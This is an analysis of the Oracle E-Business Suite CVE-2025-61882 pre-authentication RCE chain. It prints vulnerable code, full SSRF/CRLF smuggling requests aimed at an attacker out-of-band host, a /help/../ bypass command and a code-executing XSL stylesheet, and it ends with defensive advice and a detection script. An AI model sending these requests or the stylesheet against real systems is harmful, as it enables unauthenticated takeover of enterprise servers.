Analysis of the Oracle E-Business Suite Pre-Authentication RCE Vulnerability Chain (CVE-2025-61882)
Vulnerability overview
CVE-2025-61882 is not a single vulnerability but a complete attack chain composed of several small and medium-sized weaknesses that together yield pre-authentication remote code execution. Affected versions range from 12.2.3 through 12.2.14, and an attacker can exploit the chain remotely over the network without any authentication.
Attack chain breakdown
Stage 1: Server-Side Request Forgery (SSRF)
The attack begins by sending a crafted XML request to /OA_HTML/configurator/UiServlet, abusing the backend server to issue arbitrary HTTP requests.
Vulnerable code analysis:

```java
if (paramHttpServletRequest.getParameter("killAndRestartServer") != null) {
    // ...
} else if (paramHttpServletRequest.getParameter("generateOutput") != null) {
    // ...
} else if (paramHttpServletRequest.getParameter("getUiType") != null) {
    // Both parameters below are taken directly from the unauthenticated request.
    String str = paramHttpServletRequest.getParameter("redirectFromJsp");
    // The attacker-supplied XML is parsed without any validation.
    XMLDocument xMLDocument = XmlUtil.parseXmlString(paramHttpServletRequest.getParameter("getUiType"));
    if (str == null || "false".equalsIgnoreCase(str)) {
        // ...
    }
    // The parsed document, including its return_url parameter, reaches createNew().
    createNew(xMLDocument, httpSession, paramHttpServletRequest, paramHttpServletResponse);
}
```
The attacker supplies an XML document through the getUiType parameter; when redirectFromJsp is set to a true value, the XML content is handed to createNew() for processing.
SSRF trigger request:

```http
POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 407

redirectFromJsp=1&getUiType=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Cinitialize%3E%0A%20%20%20%20%3Cparam%20name%3D%22init_was_saved%22%3Etest%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22return_url%22%3Ehttp%3A%2F%2F%7B%7Bexternal-host%7D%7D%3C%2Fparam%3E%0A%20%0A%20%20%20%20%3Cparam%20name%3D%22ui_def_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22config_effective_usage_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22ui_type%22%3EApplet%3C%2Fparam%3E%0A%3C%2Finitialize%3E
```
Stage 2: CRLF injection
Building on the SSRF, the attacker uses CRLF (carriage return / line feed) payloads to take full control of the SSRF request content and inject arbitrary HTTP headers.
CRLF injection example:

```http
POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 524

redirectFromJsp=1&getUiType=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Cinitialize%3E%0A%20%20%20%20%3Cparam%20name%3D%22init_was_saved%22%3Etest%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22return_url%22%3E%3Chttp%3A%2F%2Fattacker-oob-server%3E%26%2347%3BHeaderInjectionTest%26%2332%3BHTTP%26%2347%3B1%26%2346%3B1%26%2313%3B%26%2310%3BInjectedHeader%26%2358%3BInjected%26%2313%3B%26%2310%3B%26%2332%3B%26%2313%3B%26%2310%3B%26%2313%3B%26%2313%3B%26%2310%3B%26%2313%3B%26%2313%3B%26%2310%3B%26%2313%3B%26%2313%3B%26%2310%3BPOST%26%2332%3B%26%2347%3B%3C%2Fparam%3E%0A%20%0A%20%20%20%20%3Cparam%20name%3D%22ui_def_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22config_effective_usage_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22ui_type%22%3EApplet%3C%2Fparam%3E%0A%3C%2Finitialize%3E
```
Stage 3: Abuse of HTTP persistent connections
The chain relies on HTTP persistent connections (keep-alive): once SSRF and CRLF injection give control over the request framing, additional requests are chained on the same TCP connection, which improves reliability and reduces noise.
Stage 4: Authentication filter bypass
Oracle EBS deployments typically expose the core application service on port 7201/TCP. The chain uses the known hostname apps.example.com to smuggle requests to this internal service.
Authentication bypass technique:
The Java application filter is bypassed with path traversal (../) or the Java-specific ..;/ sequence, because paths under /help/ do not require authentication.
Example request:

```shell
curl -s --path-as-is http://apps.example.com:7201/OA_HTML/help/../ieshostedsurvey.jsp
```
Stage 5: XSL Transformation (XSLT) injection
The final target of the chain, ieshostedsurvey.jsp, contains an XSLT processing flaw:
Vulnerable code analysis:

```java
StringBuffer urlbuf = new StringBuffer();
urlbuf.append("http://");
// getServerName() is derived from the request's Host header, which the client controls.
urlbuf.append(request.getServerName());
urlbuf.append(":").append(request.getServerPort()).append(URI.toString());
// The stylesheet location is therefore built from attacker-influenced input.
String xslURL = urlbuf.toString() + "ieshostedsurvey.xsl";
URL stylesheetURL = new URL(xslURL.toString());
// The remote stylesheet is fetched and executed by the XSLT processor.
XSLStylesheet sheet = new XSLStylesheet(stylesheetURL,stylesheetURL);
XSLProcessor xslt = new XSLProcessor();
xslt.processXSL(sheet, xmlDoc, new PrintWriter(new BufferedWriter(new OutputStreamWriter(outBytes))));
```

The code builds a remote URL from the incoming Host header, so the Java code downloads ieshostedsurvey.xsl from an attacker-controlled server. Because XSLT processing in Java can invoke templates and extension functions, loading an untrusted stylesheet lets the attacker achieve arbitrary remote code execution.
Assembling the full attack chain
Final attack request:

```http
POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: not-actually-watchtowr.com-stop-emailing-us-about-iocs:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
Content-Length: 847
Content-Type: application/x-www-form-urlencoded

redirectFromJsp=1&getUiType=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Cinitialize%3E%0A%20%20%20%20%3Cparam%20name%3D%22init_was_saved%22%3Etest%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22return_url%22%3E%3Chttp%3A%2F%2Fapps.example.com%3A7201%3E%26%2347%3BOA_HTML%26%2347%3Bhelp%26%2347%3B..%26%2347%3Bieshostedsurvey.jsp%26%2332%3BHTTP%26%2347%3B1.2%0AHost%3A%26%2332%3Battacker-oob-server%0AUser-Agent%3A%26%2332%3Banything%0AConnection%3A%26%2332%3Bkeep-alive%0ACookie%3A%26%2332%3BJSESSIONID%3D_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146%3B%26%2332%3BEBSDB%3DoSVgJCh0YacxUZCwOlLajtL2zo%0A%20%0A%0APOST%26%2332%3B%26%2347%3B%3C%2Fparam%3E%0A%20%0A%20%20%20%20%3Cparam%20name%3D%22ui_def_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22config_effective_usage_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22ui_type%22%3EApplet%3C%2Fparam%3E%0A%3C%2Finitialize%3E
```
The attacker serves a malicious XSL document from the server they control to trigger arbitrary code execution:

```xml
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
<xsl:template match="/">
<xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'[base64_encoded_payload]')"/>
<xsl:variable name="js" select="str:new($bs)"/>
<xsl:variable name="m" select="jsm:new()"/>
<xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
<xsl:variable name="code" select="eng:eval($e, $js)"/>
<xsl:value-of select="$code"/>
</xsl:template>
</xsl:stylesheet>
```
Defensive recommendations
This chain illustrates the complexity of modern attacks. Defenders should monitor network traffic comprehensively, apply Oracle's official patches promptly, and enforce strict network segmentation for access to internal services.
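As an added detection example (not code from the original write-up or from Oracle), the function below inspects an inbound EBS request for the request-side indicators of stages 1, 2 and 4 described above: a UiServlet return_url pointing off-host, CR/LF character references inside return_url, and traversal out of the unauthenticated /help/ tree. The trusted host list and the sample bodies are constructed placeholders.

```python
import html
import re
from urllib.parse import parse_qs, quote, unquote

# Hosts this EBS instance may legitimately reference in return_url
# (constructed placeholder values for this example).
TRUSTED_HOSTS = {"apps.example.com", "apps.example.com:7201"}

RETURN_URL_RE = re.compile(r'<param\s+name="return_url">(.*?)</param>', re.S)
# Matches both /help/../ and the Java-specific /help/..;/ forms.
TRAVERSAL_RE = re.compile(r"/help/(?:[^/]*/)*?\.\.;?/", re.I)


def inspect_request(path, body=""):
    """Return indicator strings for one inbound EBS request (empty = clean)."""
    findings = []
    if TRAVERSAL_RE.search(unquote(path)):
        findings.append("traversal out of /help/ (auth filter bypass)")
    if "/configurator/UiServlet" in path and body:
        xml_text = parse_qs(body, keep_blank_values=True).get("getUiType", [""])[0]
        m = RETURN_URL_RE.search(xml_text)
        if m:
            # Expand &#13; &#10; &#47; etc. the same way the XML parser would.
            value = html.unescape(m.group(1)).strip()
            if "\r" in value or "\n" in value:
                findings.append("CR/LF inside return_url (header injection)")
            if TRAVERSAL_RE.search(value):
                findings.append("traversal inside return_url")
            host = re.match(r"<?https?://([^/\s>]+)", value)
            if host and host.group(1) not in TRUSTED_HOSTS:
                findings.append("return_url targets untrusted host " + host.group(1))
            elif not host:
                findings.append("return_url is not an http(s) URL")
    return findings


def ui_body(return_url):
    """Build a UiServlet POST body carrying the given return_url (constructed sample)."""
    xml = '<initialize><param name="return_url">%s</param></initialize>' % return_url
    return "redirectFromJsp=1&getUiType=" + quote(xml, safe="")


# Constructed samples modelled on the stage 1 and stage 2 requests above.
SAMPLE_SSRF = ui_body("http://oob.invalid")
SAMPLE_CRLF = ui_body("<http://oob.invalid>&#47;x&#32;HTTP&#47;1.1&#13;&#10;X:&#32;y")
```

Run it from a WAF hook or over captured request bodies; note that a plain access log does not record POST bodies, so the UiServlet checks need the body from a proxy or full-packet capture.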